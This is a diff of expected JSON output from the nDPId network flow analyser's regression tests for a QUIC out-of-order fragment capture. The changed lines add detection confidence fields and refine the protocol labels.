 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1621496172813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621496172813,"pkt":"AAAAAAAAAAEA4PSECABFAAViwpdAAH4RVxyokEAFXWSX3c7OAbsFTudOyP8AAB0IJfFU5PX57qcAAEU0c0zbXMVn6Pcd4e7ZmfGe\/qxoruMGwPYAlsdY4bBFIJBxlfIjvR+3r8n\/O3U+qJTKKUq8qa0QleuYrfTMsn8O\/y7hixYXl+TzY\/2tPZFmjgWjPy8Q3ousCTGpMjiPdDu1aKCA8puIhbArl8N6Da6NPpGg72zv38j3AEI+JJUvltWracNeEqzqLjSdIseAljbdck9dGPDQn0DHp\/nLF0OQLhgPW7is5GRoEeUyeCGTQitO7sJ+0GFP4Tawvy3HpIB8sQ\/mvWQBI36+Vr0IvUC92N81WsKioT12i3z0lrAFRKc2nrIsK9qzHEDcHRWO8IWXX8n7Ylt6igAVfNRjEBAM2NXSGElvaDPhl5W14nFw2qReuostjw9VWKaXa0YpEemQwzzCdWf\/l2eJ\/wYr+I8wfqvsxZTTgvvVqGvZbvCnJarMpvykClV78Fjr7zdoJH0h6e4wj\/zK66Jl9dPkQ7jrAIn8Djc77n3JalsxT45E5h\/vwJ6Hy1Yu62tVg0onyAEaJRgShAbt65WHHuuOjUbOO7SgM\/l1B3NkYxFQRjbPkOp7\/+btlneTdmAOHcL660GLIGJvYuSg3GxeNY\/RvOuUCpKgbpyQvoy56KwcUUR0q+ZfCEfPOk+4i3eO9doEvGZqOHv6OheClMqNVyw4H6sb5ovkDq\/C4Luz4OZtiQxZAB9o8Z+XJbrSEebIisx\/MMDHqbWhehe1Eg0mRwnSpSkDsUCYcCDmBZZpNGxtE8k+8ji5vCVnS5atqC1q22zlTPttfegwTwCR34A50P0f\/cSq+ZjRg8lUGBiJMY633IK0UkUJK3qD2M+BLuyIwMRCQaYB5FWwQptU0wzlZlcAZTHpnhVpthl5\/8JNWtmRYqhefl5vburajPxYg4gOqVoHDVonhwMZ\/I71i2OZh\/xUUB+2rkwL41c5gUjryBwPqx6xlbPDXfHRijhx6FEeECng0ZOpqAj4GzPzd+hfEZoL+A\/zpIFLSkxIkmdjto2cmeEjcK2ZmzuUECn2TbWRXdwA0raRmtbKwoHqebinUG4Zd73sgqZPzhb6S6fRcJFXth6D1WkWMX\/pmvTBFmwsZtj4vIKhZgtGCFvnCsFQjZwKMGDdk8IcMtc7fRP\/WFw138PAOKXN4\/cwBXBJiHWUsfHmH4IEa3yYTAmTO5bAv3vbyW7AGUPPSZsFuGjThPYUOEo4obqTwpRd+7G7Fj8PTDc9\/SuvOHeEFG8SNmZczyUVz7P\/pwxY9P0pFzlzfGNZ1Yf7NIqIcuZwIAu1QHM8TKxiNpKLXkwY5gWi5EHkWT7ieNOA\/PME3V7yn6j9jdSLAgF1RLKr0bwOhlmrTCeyjtBkecLPxW\/ZpUJSAVdMBzXR4O9Zh2\/3JmabiOVhFtw1hF3o2eH8fM2+XAKwoI8UVoKaXC5im6tL\/RAIV7zKy5boKMeRbQM9fQyx\/xdvgnYYAepCXa5LMPTBjm8XbDITPP1e5aEovXRZlii1OC0w0plqCde8kUQfkZW0LCgurP5FzP2Aui0bpTHOGUVN1ugsbXrtv40HL7weMrKI+pmagU+tsECSDoFrx7+qtDT0YFo235yejWP4S7BEg\/McKYbD5TUBYFtwlDeTjyPkNpblYnvhSMMuhXgVIEl+Jn3adbs96ij4KSAIxF\/p\/twgKC3\/qYYlDHvYQriXuCWK9963IJqD8REoU72BQdfNgjTgbXB0ZOu7ItHmtPuAN9cWJ\/uL2kM5RxQU\/UDcei+A\/uNYyRIl3aPttcTgFoW4dVR1MlFwi\/UvUZjaUxjT"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496437543,"flow_last_seen":1621496437543,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1621496437543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621496437543,"pkt":"AAAAAAAAAAQA+mr7CABFAAViYKNAAH4RaeQ0uxSvxkodT\/KiAbsFTtIIyv8AAB0IvPCERtRr\/7QAAEU0VDep\/CZnpIQa8eVhNyJ3U1QCAukLnPnKtOrC\/7zKB1G+98eg7ftwXdiCu4mjtl1Q8mNJOaDHQdHo\/ZnotZk2q+6WYBr5DXX5QHa13JOYGLxoc9qyOjz+jbwetc54i8U7+0kSHAbALiGoIDK5WQRRZWetkNux+DZoWjHY5WfosmGRQsxtOixsR3jt9j7FOo4uqSxQGhtqIeA0i25755C0K1hzCtZHRQuy55gnoUo6zZiPhelVtIcqgCilkIu+IaiAgPdY8qusu3Q9ASMkRkk0UX5H8nUY5fVDgGL4DjsJROTA71uUmNZenr0sr5JOl\/aDX74AH3H77h7yG8JDcWCMqta2iHG5v7LfQn6HD8EvX8A9+X1BPgSNN1do76JMe5qE+cL6FAAbPHwnyEKr00VkR3NF0Wj71jZ14VH7imUBnL66mFh+udQFwSu20vdM9c8XD4z8cDkFHoqTsPkKjRGkjCQi8gB1gYo0m\/YFj+JeaePbkDvq0OSLPaTj\/\/uR93wYJiwS6oC\/aiMrt4Ai7n7\/FG5FTHmyLQWtwhpvmSeJKiasDEobo8lDxko0INCDfgQfJ3SBS6Viiln\/ASliXjKWu4SrneUfwv6qaK5CsTzFRpoqdrt\/s\/4hApSQqHe2ymAF3JbfHyoRulU2oXzj3PnMlAj4Z4Vj4oik802VNCwqS9rwhkgwLpg2ForHv0BBRPYvL6MVNDpoeE6Q+fkjAsxQcCry3Tg\/0ntsyB77pU9N+6ViiIk\/seArDaEwUpWw96CaP6HGoEH+ITzRBw4NaVx1WIIOT111vCFZOdJbhxCcjcGlkWUXH2Mfa710gWwLlFOy8LDSs50FqSN\/OPohmIvSl5JLifaSN0t8gyVjvGme43FCNf1IRmz\/msB0elm4bS6ud+82racQS6O6aZIJmDUDJkR4HH9e\/YL1z+2ASyQ94Fzatzpb4GFKnXYPSRR9ZXr+nLzhoRIUWJY27XaWKYbXR\/JgJvZqSpd9j1Y9iIYmFAj\/kzwA1TDOawG0jmZJvOHRbLPdttFMT9Z8ICzQz7sbYr50LzOCpscApRYi0yCxCW+7FvKkaUxLEeqVZNTb5bfzGXSqygFSO8Onu18Vfr2pGmZ97fTY05vmeNRaTdGB9GDxEB+of1UDIaNk5S6UGJN8C0OX2skQW9hdlLAoFJbl3R\/kaaNQomNrWf12eVjbEPUwYduxDkiFO\/Cu3xI8s\/1bhAxAoo1eoosHRSb+RfuzYRRHXHaCwK0syV2XsapF5fct1hE0QKESIuGMqkYTacUhiZ+am2170YsnbIH6mCpW2GWX2kdp\/NRfot7wqoww4YL4kQ0dV2zP8iVLBMwBcBBj7jRlAJPmU94cd1+2yA9MIjBhwW2o6kySfxuLx1CH1XTXYxyDRbLVbIkYJ9KjklyMjtPqIcfNaglBMiG4bD+cmIuV+JVF2yBdmwLpupy8GkZrPVtTuFpepOJxWGxrxdE4LNF44zdCZCWF5fsbh0tA\/4QNVZd3EvAFmb9igKxLlVrUdRexT5v0zY8qkBoP74MZTTSWxXbGUHSlroYRRVjE1ko2j801gomU8QxZIsnLdQPtAkZ1hEimDc88Y35XyX679476yZ\/aqcOmLMYDbu0Vw3kbH\/S1Pi\/Q6fIKsIvYN8tlqc6ZQKWv4iCbutDJNK0I1762s\/zDONmC7qcwhUo\/1eKb+bifa8jDvxqbQH5WTi1a8brNLoMOVpui\/c73ZoNVIkMLLnI\/xxYiZknhsfNiaQgxORr7sklMg7Kd\/f31pN0pVpaR"}
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496437543,"flow_last_seen":1621496437543,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00699{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496437543,"flow_last_seen":1621496437543,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621496437543,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1621496437852,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621496437852,"pkt":"AAAAAAAAAAQA+mr7CABFAAViYK5AAH4Radk0uxSvxkodT\/KiAbsFTi+oyv8AAB0IvPCERtRr\/7QAAEU0JaLtoHyofbRbg8jGkawveiyJ2UaoheXbSYuPTeMKCeIU77lABrfhjW\/KFsoqVpaP9JKJMlnvWCAfrhYhpHkJG+xvxdGDmZWYW6e1KGN5t8DibwD+sY7U6We2yL0NMOrSYyY67PZ33CEYMgrO+bU1ma8i3+NoKnZhxsjAkaglJ6uAUozF4XuimP6iU+KzggGtZ5AHeHRJJSrIijvm2uURkPI\/Zf52SGLY+vL4vQPTe7wS1EKJeXUmQgYmh2aup9vLeWlDTkRpMf1EwpwHNlukj5oBWVeoeBmaQD4sx+NuopJ+2QprYWTuKVJ508tJ6HgsW5Ot7jO5bBygYTExm8AhqCnq4UjBmnft2hLhbA7\/d3ydVpIp7qFrWPv9n07PW58yXrAf70XLdskX2QCxfb2EahbYmb3Vx+DoN9ZQfyauIGIQJ4G4xs7NSUBH1KpzLXiWyZKGC2bhtRyON+3HzPjWFxkL0Tfa80\/+SxEpgasrCwJQb+1o6V\/lNwqybT5vHn79PHBIvEpedoaDM+BEu+O79uo27iS8RNPO794dIBqh+wJSlgKlH5zeUshHAvvFJn1TFlqv8TRVbuRhgffiNiYg0o1CeqH6Zf28VhJJpbsJJD4AZ\/jSirQZxHEWJI7alxgK\/LiDdkgpKDEWpc3pue7siiUI86wkuQp3ziUbYYUwf+3S2XmN4C+TOxmkT5fxEIOXMUz4o9qBlMvVx+HeJXeP4+1XADUariBmhpvXNO6nl8VgSR05a2jc1zcSQm6hoH7Sjq19QDV7jFEfc7eLbvAvOLM23DWJ+wh4NpHj9pZdPlAmebA1IRONzVUDs+FLPzEH62RBEORoAtOT4e39cJai5gPk0i6dU0vofBLpifIxzMyKYaGd4qxHI1hU\/vumyHtthijttX3+DFdn3RYaqCp1LpOaUmoX\/6sMVu8m0LGWnwhQqFoSAeJsuv14Al7ULvCdbJM06GXHtuP8hOpztz8GERiD3IE4+pHtQzzeOFwW3gBxM8vb\/kgHuBEO3Ngo3tjKIHZU34x718MZS7qAptuEPHVkm+ESamOD7xBmeB3Lqe2ntH0yaZ0R1ojSk6QGp9l\/DQGTgYlqqmVVplJJS9Mq23y4sYJANTI+VTWYMkD6NqRCbwxSayYlRmpI0bsWTBa3Egd5P7LRpi+3cNo9ZuEhXIAF3ycXIYlhzeSYSYvtqmdmjkTzNQLLrulkQ5zCYRtkU4zvk\/g9mgS2CcfxLTkjgtei6kwqIx3Nk4h0E0OZscgKCSJf4cRmCCOmfcnN0SQlWhChNjlpr8NXwxRXP\/99Mm1hVM9\/1cJQ8UoVQJDRNojN3SkiUl26oijeQfH807azHA\/97ACgXT19Mdl1O3NlO9Iz\/csL8LLesYa1qB5z+IjimX42W8TXFqTRlbQ7oeAmIc8H5U32U0xeqTwvh76ZUT0WO\/Hpn0xBlv6aqBcKb1Cxl7JTIzz67aCTV66YXN8NeR593i1+u0PvZCPySYf5PqAIuY3yAjXufep0Fzzko0vw1dgNNd1cSLqgPBALOXp4QpvYDsh5OdOzrPtb9Bwn8\/YjM65iU1fQJwe0pFgWPBk3OLAC1ivEA1X2opEADJmIj\/+8LvIdF6nYgzKjVtmvtV9atGouRJomruCL8JxrFfNeHoRpx0yRl9yU\/q2BGWdEuqEHO6y7Tbfu0SWUkh49LajcNcpvqE+bJljstNdRH3yFDQnBncwCCqj4zSbXWQeeQR2mI+3rqRgA1HwOB+cQZChDPCGByW10tu7BtVyE7\/y\/Y+sF"}
 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1621496438462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621496438462,"pkt":"AAAAAAAAAAQA+mr7CABFAAViYK9AAH4Radg0uxSvxkodT\/KiAbsFTjIVyf8AAB0IvPCERtRr\/7QAAEU0a1V3BXBwEIhDElH\/1qUxqcqfVK\/U+I3pv8jXB6GKoLcClwfi5i+JVRi\/+qOD0jSHpVm+CcmsqV2quEgqGH5Gn0rihcbJDGj870ULZI4KmDKfC69q5r6675Wy4U0x28m2t5DK6rGqmJIfuY4CLJ5+JpnAGepaot5zw988NS9MjaUUAwJq0KRJTk9TQLF3FkyUeCnv+L2\/mCZ4pQPvTUHoai0BPsJAkEBQbCDT0ne2qov3gwfXPyGYjT+qpU1DonWmFNb695dnTcteFv3XvXkEd58E8n7ydtguTKEpl548CM+1ZWTRyyMlXz4XZF8nSLIMx0GUIZgZvabVLDS2+F0B521wAlGhNrm8PRINe9rBVvQYcP4xgohRdv3nDuVcLpMwOSEXj4YWgyE3ZUgeAzYB\/H75MXEyWx2rB05U\/7TWZ7NlkA33O50sz9d4a2o1c3cNntoxGwlEfyLKcihZ\/Suz\/KxirS++R\/qp01ueSmHonRfmrrM1LSGcMyKd+Oc4e5KssoiJAFl2Nso9pSh\/Hc4LC0BNO2pv99cb2fqWMrvtg4RKbfx1R5ZiccoCxgCpi46Y\/bGbfrDImS2xG9ERCTD6jtG0jRR1KV9w3yPJD6dZUx9vPrSlfE7TRtUvV2tg2P8RQt\/NsSQk3\/7JpfMhAIPApofSUgXm0f7r+8Zw1J12aP1zZsU9ZyRmQPc6usI4DXJN8WSrOMAw2YJx5dHRsAS5bRsxti2UCq\/PcqbnjXZexpjegsnkWKYnN\/pwtZdssK+ny+99042hifAuhg\/BXmwZfuFZ7LWOinb0yOszMgV4GVujdcSyRmmJB+im4Mj4o509W5k04dZ0bDE52gnvESt2EXA8x4iUBeMzV1EC9VoL2Zd72WZ2Le8+\/S0MFe3Se8D\/liSQe5dY3M\/L+3ZXq\/9nfvzioEORhqMqj8nSgClQeG9dmdKGgxM5mcQ9CeGNozwRdxhJvWFmctGZQ2NjWDhhDHDaqU259Q3FvsbElzHVdrJ5mJ0Cxf9ajFKPgkVOGdrDG9ApKtfsvTm8mcEa8n0Q62eOymCVJqvif5jaYy+ecjinMVsEogfItZgW86yqnm54hcKotzJtaFtp3CA5T0NjiL0VfXkiOTKfOXVWtwS2R+LPX1ibd8kfkwAh\/XXkesEqkGqJKfxtLjiY18HS1YhU3t6JkzeJqPLrJB\/PbFwyElYds\/6m0\/g+LOXOZ67UcdCScV0su9cTzTbpFuilpU31PFlGsAgDKmvkZLzN7jt\/kqOCXoWwgg9bPQkbwwNwl54A9eMPW3BHZk0poDKL2DWdoWQmTEsHc0pqdf\/k0atEtrhXPDE6dm9ctnyGia88NrHpejAS5iOiAf1eL4iWXQNTQkLKwlOqi0oh5WENqyW2gdD3O5vPNDr95MLc6Nk9E3B2M+6BndVVw6tTuGClOXozYuEVgbdPUEQGHunkA\/dCQkelRbanSo5cdvMQPWbxeU5G497tiSuxNDfmsujYTz\/BK6JWmejCS\/KhAJaMKx7PrcrPsaNqhZU4Mn4\/jSs11bYdbYsLm+pMXqsl9X68WqxfFniiajHo\/Fd3P7UYw9qKzJA5hFllxa12+AedgC513u0kPjxtExQUdI3b78Ms+FaM6UYc1IOQ6tYJC\/kR00xvH3J0uZZ0HafuTIIxCiV49M2ik73I2gkK\/TLa9hQf1LFJjsPj9VPpRxrc2Ly1SzJ7P1j6ovi9NMEeR\/e7+QcpnMJTH1C\/dGDgaTfjeelKzH0zIUwM4v73ZogzQ+Q6mOQCAb1RAyJQ"}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621496437543,"flow_last_seen":1621496439665,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":62114,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1621497523457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621497523457,"pkt":"AAAAAAAAAAEA737VCABFAAViBEZAAH4RSb6okEAFI8KdL9kJAbsFTlfcy\/8AAB0IhCcF96VVR0wANwBlELxIAYrJ18RJAopwESH080EDiTGBxAUIotc1YUcdQDx6Fm+qNXboDChqvIPFhdQk4GOqHNpE\/bcP8275wY0w3P5\/OBD00jBZFIIxdkIc1CxBuDirFHD1tP5B64vwQ5D8UGBMCwXBE5r8cQBEBueMDl1wCzedkaTPJndcvmabltC3xUmd0wwNZF33vrM44e1g6fvolfFIRSR585LU+EPiXYcJSO8XezQCKfsKP9OZPhOtv83h2Ovh66Ofu5lyKK97w1ZRH4fHbdZfIN43raCsZSEISB1XWpjeStwCQgX4pxEVT3bu7OPulibsntpcBDvvUq8hjhYS\/PbA9GsLf8ab2oDiv9nzg4n5gSjTjYJYqGNdpo8pvu3k0XjbFxeoYR+3bONBa+e0\/V5cimHNpgKrVTimMaMMdAFaY6tT7OKkXataUcGKIOpI4ClrI1RfjXBlfZBLOZbQ1ruqGWnukjIXOQ89MmoF02WXH\/OXh+KKRAFzwlapiv\/cQ9QlO9JZ0BB+POvvg0IQYksHMghnQAgMTrJM4innxppRZzBoWz9zsOmK6XhRhELNfRCbi4bc5YsBdjiD3ijjj0vhvLYkE8cmxkLuJ0qhNxl3p6hz2KHodGMRRnCY7+yW4\/w95\/W2ZXETMOaiPG4P8rFj6ml8\/VAIeNI42nP1oow2vPc0sprOkAOau2yfl6UbQppTRhQbTZO9wnp0+pb\/YLR560RKcRxZ6gUiuP4fRQpX1VnT9F+IXXx+\/hKRHGdtC446mKetR0R2fffEU3RdpszGGUSJYY9vViq2Eomp2NB2XsGSDZ7grvOQePwuxkF\/VdXMAKr33SX3CCDNZsxfwsHeafmqicnZBNljaecFtLy\/+9HYZeH3f2cDOX3K2VDbGR9cx+8R4uBk0EX\/px+zKszwuAcjJAvJeXJiBBoZwb1OylfJtFW0xyteXH7T57KNedRu+91GNpzswbrgQyjlkhovo1OK0t72ahVmG3ci4ldbaNoM9Er9o1PA3dEHVxpZIkVGwMvOCLlkTsNn7BvKy8UOqhGyMtxMVZXmLf+vQAImY7kO\/JmvUFXGBjLGGoDqDl13TqPutG44hrxR02KIBhULXqIMEKZ0qrvWpm\/\/odFSsCLPU5KX8gvQDTeNqgXvhS5yCTtJ\/E1FTIQ62Whbkz803oSWqHMyB9PTWsfyUOvQ\/rOPfM2Hp8037xRyvZ557yfBRFUiv70NQLV2Zzve\/8q4\/+h+Fri1+bTl59+RUidiY1TO3qvxPwSqJrc\/iUXUAxTJ\/iVUXyZcuGGc8bsiOTTBgqyOg9Hj4pZ\/3cKkgSVM8pOpKr\/hPcaL1tH1m5MiC8PYtFySKzAit5RXN62RM\/yP3bFdJNWXn3q6vSa6Nwy+6UJmoWNwQrB89OTwcDbVLvIvUrUOYSdw5tw4rl8hCKo38y10qvUFE7S\/vxva\/p2Znrp2ZVkSxayvzUJu3VFimVxiL3A7sYZs6c\/thutzyxZvCEQ2Ehf93l2gbRl7+GjjrhvbWDav5GzhJ32x7RnRqMQA6g7ihAB1sROsstlfmwTAaFrKCBAN7dq4qC4xFv28ox5F9z+6hjCXyOJStyP4WcjK+tovRhkLpdG2Wvd9PUpQyVc7n2VNtkJqiMlfYa2ialoeXEG2XlWpLp8Nvi5ARgJCTGZFWy91dkcCOz8sVye7XwnEDxu0kn98A2gCBLP47MxjqlsbBe\/36a444Y35PEcLtU3xUP\/8uuTpLZz8LGaII+NM3hazyvTcHrfjqZ0yk555T\/\/FaKekILXf"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00705{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621497523457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleCloud","breed":"Acceptable","category":"Cloud"},"quic": {}}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498081522,"flow_last_seen":1621498081522,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
